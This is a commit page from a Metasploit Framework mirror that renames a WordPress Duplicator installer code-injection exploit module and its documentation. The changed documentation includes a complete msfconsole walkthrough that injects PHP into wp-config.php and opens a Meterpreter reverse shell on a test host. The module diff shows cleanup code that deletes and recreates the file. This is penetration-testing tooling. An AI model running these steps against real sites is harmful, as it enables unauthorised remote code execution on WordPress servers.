infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

renamed module and doc

master
Shelby Pace 2018-12-11 11:59:19 -06:00
parent 7e953e34b9
commit b82e3469a2
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
2 changed files with 25 additions and 21 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
documentation/modules/exploit/multi/php/wordpress_duplicator.md → documentation/modules/exploit/multi/php/wp_duplicator_code_inject.md
View File

@ -23,7 +23,7 @@ Put the `install.php` and archive files on a clean web server.
Confirm that functionality works:
1. Start `msfconsole`
2. `use exploit/multi/php/wordpress_duplicator`
2. `use exploit/multi/php/wp_duplicator_code_inject`
3. Set the `RHOST`.
4. Confirm the target is vulnerable: `check`
5. Confirm that the target is vulnerable: `The target is vulnerable.`
@ -44,26 +44,29 @@ The path to the installer.php file to exploit By default, the path is `/installe
### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40
```
msf5 > use exploit/multi/php/wordpress_duplicator
msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1
RHOSTS => 192.168.56.101
msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php
TARGETURI => /installer_vuln.php
msf5 exploit(multi/php/wordpress_duplicator) > run
msf5 > use exploit/multi/php/wp_duplicator_code_inject
msf5 exploit(multi/php/wp_duplicator_code_inject) > set rhosts 192.168.37.247
rhosts => 192.168.37.247
msf5 exploit(multi/php/wp_duplicator_code_inject) > set targeturi /wordpress/installer.php
targeturi => /wordpress/installer.php
msf5 exploit(multi/php/wp_duplicator_code_inject) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/php/wp_duplicator_code_inject) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Checking if the wp-config.php file already exists...
[*] This WordPress was not restored. Creating the wp-config.php file...
[*] Successfully created the wp-config.php file!
[*] All good! Injecting PHP code in the wp-config.php file...
[*] Requesting wp-config.php to execute the payload...
[*] Sending stage (37775 bytes) to 1.1.1.1
[*] Sending stage (38247 bytes) to 192.168.37.247
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.247:1251) at 2018-12-11 11:46:16 -0600
[*] Attempting to recreate wp-config file...
[*] Found archive name 20181127_test_site_126e49aaa44976fa5226181127215223_archive.zip
[*] Successfully created the wp-config.php file!
meterpreter > sysinfo
Computer : debian
OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64
Meterpreter : php/linux
meterpreter > sysinfo
Computer : WIN-0FAJA14JLP4
OS : Windows NT WIN-0FAJA14JLP4 6.1 build 7601 (Windows 7 Enterprise Edition Service Pack 1) i586
Meterpreter : php/windows
meterpreter >
```

9
modules/exploits/multi/php/wordpress_duplicator.rb → modules/exploits/multi/php/wp_duplicator_code_inject.rb
View File

@ -143,12 +143,13 @@ class MetasploitModule < Msf::Exploit::Remote
end
def on_new_session(client)
if client.type.eql? 'meterpreter'
client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
client.fs.file.rm 'wp-config.php'
if client.type.eql?('meterpreter')
client.core.use('stdapi') unless client.ext.aliases.include?('stdapi')
client.fs.file.rm('wp-config.php')
else
client.shell_command_token 'rm wp-config.php'
client.shell_command_token('rm wp-config.php')
end
print_status("Attempting to recreate wp-config file...")
create_wp_config_file
end
end